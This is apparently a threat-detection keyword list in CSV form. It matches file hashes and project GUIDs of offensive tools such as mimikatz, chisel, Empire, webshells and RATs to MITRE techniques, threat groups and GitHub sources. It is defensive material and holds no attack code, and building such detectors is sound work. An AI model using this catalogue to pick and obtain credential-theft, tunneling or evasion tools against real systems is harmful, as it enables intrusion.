"*4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c*",".{0,1000}4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26379" "*4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4*",".{0,1000}4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - 
T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26382" "*4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d*",".{0,1000}4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26383" "*4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6*",".{0,1000}4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26384" "*4ED3C17D-33E6-4B86-9FA0-DA774B7CD387*",".{0,1000}4ED3C17D\-33E6\-4B86\-9FA0\-DA774B7CD387.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","26385" "*4ed4145e2a1ea00c2cf463f86d627341b58d0e0887ae317ebfce6dd5d48f8749*",".{0,1000}4ed4145e2a1ea00c2cf463f86d627341b58d0e0887ae317ebfce6dd5d48f8749.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - 
Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","26386" "*4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea*",".{0,1000}4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","26387" "*4EE2C7E8-095D-490A-9465-9B4BB9070669*",".{0,1000}4EE2C7E8\-095D\-490A\-9465\-9B4BB9070669.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#GUIDproject","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","26389" "*4ee43d69320e28910a475259994a33b3725c7b5d65a16a457354d0c23a51c820*",".{0,1000}4ee43d69320e28910a475259994a33b3725c7b5d65a16a457354d0c23a51c820.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26390" 
"*4eea1e0122661de3208f478a47f1c09cb9480664712a0e34e753df8663025e25*",".{0,1000}4eea1e0122661de3208f478a47f1c09cb9480664712a0e34e753df8663025e25.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26391" "*4ef27da3276651f20e1d401412bb95c823f277b7a28f693eed55f819aa65e7bf*",".{0,1000}4ef27da3276651f20e1d401412bb95c823f277b7a28f693eed55f819aa65e7bf.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","26394" "*4ef4954e75d38c111212488ce16b682352f7538fdf11eb94eac86ef4885701b0*",".{0,1000}4ef4954e75d38c111212488ce16b682352f7538fdf11eb94eac86ef4885701b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26396" "*4EF73752-78B0-4E0D-A33B-B6637B6C2177*",".{0,1000}4EF73752\-78B0\-4E0D\-A33B\-B6637B6C2177.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","26397" 
"*4f050e27f770c59e8402d0faed061d0492b1d50d5aaed4f8c548b823dfa2dd09*",".{0,1000}4f050e27f770c59e8402d0faed061d0492b1d50d5aaed4f8c548b823dfa2dd09.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26399" "*4f050eea5800f10338894c847bdbfa5a93bd03115ed7a3c979422f0f0ca95739*",".{0,1000}4f050eea5800f10338894c847bdbfa5a93bd03115ed7a3c979422f0f0ca95739.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26400" "*4f0f61d1c0b3904b0a3409f8ff70af3b822b46e4c7f2fca0b642cc278b56209f*",".{0,1000}4f0f61d1c0b3904b0a3409f8ff70af3b822b46e4c7f2fca0b642cc278b56209f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26402" "*4f0fe8424ce7e9de58445e0ca1262d242861bb0239078eae16c41aec863bc09d*",".{0,1000}4f0fe8424ce7e9de58445e0ca1262d242861bb0239078eae16c41aec863bc09d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of 
hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26403" "*4f147344cc3252a3d59329031202725bc65f0ef58d41cca6fa24d5fe462fc84d*",".{0,1000}4f147344cc3252a3d59329031202725bc65f0ef58d41cca6fa24d5fe462fc84d.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26404" "*4F169EA5-8854-4258-9D2C-D44F37D88776*",".{0,1000}4F169EA5\-8854\-4258\-9D2C\-D44F37D88776.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","26405" "*4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605*",".{0,1000}4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26406" "*4f1fcdf5b4c104fb6585cd73272adc8e31a279dffd5cae84e5e83c685f4830bd*",".{0,1000}4f1fcdf5b4c104fb6585cd73272adc8e31a279dffd5cae84e5e83c685f4830bd.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26407" "*4f1ffecb374f22e4e622bc96869d412bc9e61c8fb14688336e65585fe392b20e*",".{0,1000}4f1ffecb374f22e4e622bc96869d412bc9e61c8fb14688336e65585fe392b20e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26408" "*4f2678fa0f90074ae304f8fdb9174d0c577f1a0587af44a4e8e756a547e5c2e4*",".{0,1000}4f2678fa0f90074ae304f8fdb9174d0c577f1a0587af44a4e8e756a547e5c2e4.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#filehash","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","26411" "*4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9*",".{0,1000}4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML 
output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","26412" "*4f2a713d98aedd080e4cda63a75f4057997d1aa87903649a921cadeed54463aa*",".{0,1000}4f2a713d98aedd080e4cda63a75f4057997d1aa87903649a921cadeed54463aa.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","26414" "*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*",".{0,1000}4F2AD0E0\-8C4D\-45CB\-97DE\-CE8D4177E7BF.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","26415" "*4f3632bb0c4eb05c443535dd3a773f83b3ac47f20ba75fbc3a2c8e6b80a46c60*",".{0,1000}4f3632bb0c4eb05c443535dd3a773f83b3ac47f20ba75fbc3a2c8e6b80a46c60.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 
- TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","26417" "*4f3784494848580ecfbb02690d5a22d0501a4bdc3c63fe0fdbdb81b93ae09e37*",".{0,1000}4f3784494848580ecfbb02690d5a22d0501a4bdc3c63fe0fdbdb81b93ae09e37.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26418" "*4f38ded60a6580dba88d19fb2a49dc8391a49b90133b1daf25a384d5d94111be*",".{0,1000}4f38ded60a6580dba88d19fb2a49dc8391a49b90133b1daf25a384d5d94111be.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26419" "*4f46ef9f5543cd4ca10f4908886e78dccf77b66e5ede7de8e6ec59148309b88b*",".{0,1000}4f46ef9f5543cd4ca10f4908886e78dccf77b66e5ede7de8e6ec59148309b88b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - 
T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26425" "*4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f*",".{0,1000}4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26427" "*4f5f8bd4df664f10dbd919129bbf7d8c6c8a02da74b36a20c322b5a1ce257249*",".{0,1000}4f5f8bd4df664f10dbd919129bbf7d8c6c8a02da74b36a20c322b5a1ce257249.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","26429" "*4f60610a88f4afa9393e2bbd7c20f65b59bfee7d7ca8576b25131b7bae7f30db*",".{0,1000}4f60610a88f4afa9393e2bbd7c20f65b59bfee7d7ca8576b25131b7bae7f30db.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26430" "*4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5*",".{0,1000}4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26431" "*4f715f37eddadb3d8f5680f7075e695e99496b91473f17d4507568518dd4284d*",".{0,1000}4f715f37eddadb3d8f5680f7075e695e99496b91473f17d4507568518dd4284d.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","26435" "*4f7931570b3ec42b04ef2607e39aec95ad4c863039417eff45978f58bec99c95*",".{0,1000}4f7931570b3ec42b04ef2607e39aec95ad4c863039417eff45978f58bec99c95.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26437" "*4f79abecd004edb56882c1437e180acf8352adf3edeff72546a441f02db30b09*",".{0,1000}4f79abecd004edb56882c1437e180acf8352adf3edeff72546a441f02db30b09.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26438" "*4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408*",".{0,1000}4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26439" "*4f911b0fae752353f1f78cd403a38ed44a6de2e32cfdec6b12ed5fed44a6bea1*",".{0,1000}4f911b0fae752353f1f78cd403a38ed44a6de2e32cfdec6b12ed5fed44a6bea1.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26443" "*4f9185140867a6bb07dc99ff4f41d8e3e66e60b27161b613887ed8b38f956fb1*",".{0,1000}4f9185140867a6bb07dc99ff4f41d8e3e66e60b27161b613887ed8b38f956fb1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26444" "*4f92da7a73e1e1fbe833d6208e7e7b9ca8b62fc5865453e8bedf5ba3ffff2531*",".{0,1000}4f92da7a73e1e1fbe833d6208e7e7b9ca8b62fc5865453e8bedf5ba3ffff2531.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26446" "*4fa359eb9b1b66b9421ecebb27056254ec62d0b31a68a72284dd498380dc4177*",".{0,1000}4fa359eb9b1b66b9421ecebb27056254ec62d0b31a68a72284dd498380dc4177.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26448" "*4fa537aa8c3949d9fa489c05e50c781a69620db8ead08cbe0538eb9e7d8c1016*",".{0,1000}4fa537aa8c3949d9fa489c05e50c781a69620db8ead08cbe0538eb9e7d8c1016.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26449" "*4fa756694752065bbcaf8bda18a23b6e25936e301dad50bde68ea4900592aeae*",".{0,1000}4fa756694752065bbcaf8bda18a23b6e25936e301dad50bde68ea4900592aeae.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - 
